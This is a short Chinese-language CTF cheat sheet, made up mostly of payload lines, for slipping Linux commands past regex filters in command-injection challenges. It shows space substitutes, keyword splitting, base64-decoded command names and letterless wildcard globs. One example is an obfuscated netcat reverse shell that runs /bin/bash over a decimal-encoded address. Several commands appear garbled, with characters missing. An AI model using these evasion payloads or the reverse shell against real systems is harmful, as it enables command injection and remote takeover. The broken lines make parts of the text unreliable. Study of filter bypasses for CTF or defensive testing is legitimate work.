前言:
做ctf时常常会遇到一些正则匹配将一些linux命令给过滤掉,这里将总结一些针对性的绕过方式。
一、空格绕过:
{cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'x20flag.txt'&&cat$kg (x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)
二、敏感字符绕过:
假设过滤了cat
1.利用变量绕过:
ac;b=at;$a$b
2.利用base编码绕过
`echo 'Y2F0Cg==' | base64 -d` test.txt
3.连接符截断绕过:
c'a't test.txt cat test.txt ca$@t test.txt
三、通配符绕过
?在linux里面可以进行代替一个任意字符:
/???/[l-n]s 可替代ls
/???/c?t test.txt 可替代cat test.txt
*在linux里面可以代替任意个任意字符:
ls *.php 列出当前目录下所有php文件
无字母数字匹配:
如果我们遇到一个正则将字母数字$这些都过滤掉,要我们执行一个脚本的话.
假如脚本名称为chakdiD且在根目录/etc下,我们可以用:
. /???/???????[@-[]
[@-[]表示取从@到[之间的字符,这之间的字符都为大写字母。这样就实现了无字母数字匹配的命令,就可以绕过正则了。
给一个匹配表:
| 字符 | 解释 |
|
* |
匹配任意长度任意字符 |
|
? |
匹配任意单个字符 |
|
[list] |
匹配指定范围内(list)任意单个字符,也可以是单个字符组成的集合 |
|
[^list] |
匹配指定范围外的任意单个字符或字符集合 |
|
[!list] |
同[^list] |
|
{str1,str2,…} |
匹配 srt1 或者 srt2 或者更多字符串,也可以是集合 |
几个例子:
/???/[:lower:]s /?s?/???/[n]c 2130706433 8888 -e /???/b??h ls {/ru,/tmp}n